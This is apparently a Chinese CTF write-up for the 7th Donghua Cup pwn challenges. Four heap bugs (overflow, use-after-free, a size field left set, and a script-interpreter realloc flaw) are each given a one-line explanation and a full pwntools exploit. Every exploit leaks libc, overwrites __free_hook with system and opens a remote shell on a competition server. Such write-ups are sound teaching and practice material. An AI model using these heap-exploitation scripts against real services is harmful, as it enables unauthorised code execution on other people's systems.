东华杯7th

15th，好家伙直接诸神混战。我直接蚌埠住了好吧

本队所有wp在网盘,这里只分享pwn

链接：https://pan.baidu.com/s/1y_otBzxNnE-hZcBHp59rMg
提取码：4x64
–来自百度网盘超级会员V3的分享

题目链接如下

链接：https://pan.baidu.com/s/1NwOwEgtJhp5mNNN_TeM_IA
提取码：ri4y
–来自百度网盘超级会员V3的分享

pwn

cpp1

普通题，堆溢出，不过本人当off by one打了

from pwn import *
#r=process("./pwn")
local=0
target = '47.104.143.202:43359'.split(':')
one = []
context.log_level='debug'
rc = lambda : r.recv()
rx = lambda x: r.recv(x)
ru = lambda x: r.recvuntil(x)
rud = lambda x: r.recvuntil(x, drop=True)
s = lambda x: r.send(x)
sl = lambda x: r.sendline(x)
sa = lambda x, y: r.sendafter(x, y)
sla = lambda x, y: r.sendlineafter(x, y)
close = lambda : r.close()
debug = lambda : gdb.attach(r)
shell = lambda : r.interactive()
if local:
	r = process('./pwn')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
	r = remote(target[0],target[1])
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def add(idx,size):
	sla(">>\n",str(1))
	sla("I:>>\n",str(idx))
	sla("S:>>\n",str(size))

def edit(idx,con):
	sla(">>\n",str(2))
	sla("I:>>\n",str(idx))
	sla("V:>>\n",con)

def show(idx):
	sla(">>\n",str(3))
	sla("I:>>\n",str(idx))

def dele(idx):
	sla(">>\n",str(4))
	sla("I:>>\n",str(idx))

for i in range(9):
	add(i,0xff)
for i in range(8):
	dele(i)
for i in range(7):
	add(i,0xff)
add(7,0xe8)
show(7)
leak=u64(rx(6)+b'\x00'*2)
print(hex(leak))
#raw_input()
base=leak-0x1ebce0
for i in range(9):
	dele(i)
for i in range(7):
	add(i,0x18)
add(7,0x18)
add(8,0x28)
add(9,0x18)
add(10,0x18)
for i in range(7):
	dele(i)
dele(9)
edit(7,b'a'*0x18+b'\x51')
dele(8)

add(9,0x48)
free=base+libc.sym["__free_hook"]
edit(9,p64(0)*5+p64(0x21)+p64(free-0x18)+b'a'*0x10+b'\x21')
edit(7,'a'*0x18+'\x21')
for i in range(7):
	add(i,0x18)
add(11,0x18)
add(12,0x18)
sys=base+libc.sym['system']
edit(11,b'/bin/sh\x00\n')
edit(12,b'/bin/sh\x00'+p64(sys)+b'\n')
dele(11)
#gdb.attach(r)
r.interactive()

gcc2

UAF打tcache泄露libc然后直接改fastbin的fd

from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

local = 0
target = '47.104.143.202:15348'.split(':')
one = []

r = lambda : r.recv()
rx = lambda x: r.recv(x)
ru = lambda x: r.recvuntil(x)
rud = lambda x: r.recvuntil(x, drop=True)
s = lambda x: r.send(x)
sl = lambda x: r.sendline(x)
sa = lambda x, y: r.sendafter(x, y)
sla = lambda x, y: r.sendlineafter(x, y)
close = lambda : r.close()
debug = lambda : gdb.attach(r)
shell = lambda : r.interactive()

def menu(idx):
	sla('>>',str(idx))

def add(idx,size):
	menu(1)
	sla('I:>>',str(idx))
	sla('S:>>',str(size))

def edit(idx,con):
	menu(2)
	sla('I:>>',str(idx))
	sla('V:>>',con)

def free(idx):
	menu(4)
	sla('I:>>',str(idx))

def show(idx):
	menu(3)
	sla('I:>>',str(idx))

if local:
	r = process('./rz')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
	r = remote(target[0],target[1])
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

[add(i,0x67) for i in range(2)]
add(4,0x67)
free(1)
free(0)
show(0)
ru('\n')
heap = u64(rx(6).ljust(8,b'\x00'))-0x012f30+0x10
success(hex(heap))
edit(0,p64(heap))
add(2,0x67)
add(3,0x67)
edit(3,b'\x00'*0x48+b'\x00'*6+b'\x07')
free(4)
free(3)
show(3)
base = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10-libc.sym['__malloc_hook']
f_hook = libc.sym['__free_hook']+base
system = base+libc.sym['system']
success(hex(f_hook))

edit(4,p64(f_hook))
add(5,0x67)
add(6,0x67)
edit(6,p64(system))
edit(5,b'/bin/sh\x00')
free(5)
# debug()
shell()

bg3

free的时候chunk的size位没有置0，导致了同下标申请可以溢出

from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

local = 0
target = '47.104.143.202:25997'.split(':')
one = []

r = lambda : r.recv()
rx = lambda x: r.recv(x)
ru = lambda x: r.recvuntil(x)
rud = lambda x: r.recvuntil(x, drop=True)
s = lambda x: r.send(x)
sl = lambda x: r.sendline(x)
sa = lambda x, y: r.sendafter(x, y)
sla = lambda x, y: r.sendlineafter(x, y)
close = lambda : r.close()
debug = lambda : gdb.attach(r)
shell = lambda : r.interactive()

def menu(idx):
	sla('Select:',str(idx))

def add(idx,size):
	menu(1)
	sla('Index:',str(idx))
	sla('PayloadLength:',str(size))

def edit(idx,con):
	menu(2)
	sla('Index:',str(idx))
	sla('BugInfo:',con)

def free(idx):
	menu(4)
	sla('Index:',str(idx))

def show(idx):
	menu(3)
	sla('Index:',str(idx))

if local:
	r = process('./pwn')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
	r = remote(target[0],target[1])
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


add(0,0x665)
add(1,0x68)
add(2,0x68)
free(0)
add(0,0x68)
show(0)
base = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))-1248-0x10-libc.sym['__malloc_hook']
f_hook  = base +libc.sym['__free_hook']
system = base+libc.sym['system']
success(hex(f_hook))

add(3,0x68)
add(4,0x68)
free(4)
free(3)
pl = b'\x00'*0x68+p64(0x71)+p64(f_hook)
edit(0,pl)
add(5,0x68)
add(6,0x68)
edit(5,b'/bin/sh\x00')
edit(6,p64(system))
free(5)
# debug()	
# edit(0,'a'*0x68)

shell()

boom_script

定义变量的时候生成用malloc存储，重新同名定义会free原来的再去申请新的，并且可以利用数组的存储配合input

达到任意写的效果

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
libc = ELF("./libc.so.6")
p = remote("47.104.143.202",41299)
s       = lambda data               :p.send(data)       
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data) 
r       = lambda numb=4096          :p.recv(numb)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
shell      = lambda                    :p.interactive()
uu32    = lambda data   :u32(data.ljust(4, b'\0'))
uu64    = lambda data   :u64(data.ljust(8, b'\0'))


sla("$",'1')

code="""
    a="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsa123altaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamha";
        b=a;
        a="bbbbbb";
        c=0;
        prints(b);
        array arr[20];
        arr[0]=1;
        arr[1]=2;
        b="666666";
        a1="1";
        a2="2";
        a3="3";
        a3="3";
        a4="4";
        a5="5";
        a9="cccccccc";
        k="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
        a6="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
        a7="/bin/sh";
        a8="/bin/sh";
        a6="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa";
        k="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa";
        prints("ljdhba");
        inputn(c);
        arr[0]=c;
        arr[1]=c;
        k1="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam";
        array arr1[1];
        prints("ljdhba");
        inputn(c);
        arr1[0]=c;
        a7="7";
    """
sla("length:\n",str(len(code)+1))
sla("code:\n",code)
libc_base=uu64(ru("\x7f",drop=False)[-6:])-0x1ebbe0
one=libc_base+0xe6c7e
print("libc_base",hex(libc_base))
fh=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
print('one',hex(one))

sla("ljdhba\n",str(fh-0x28))
sla("ljdhba\n",str(system))
shell()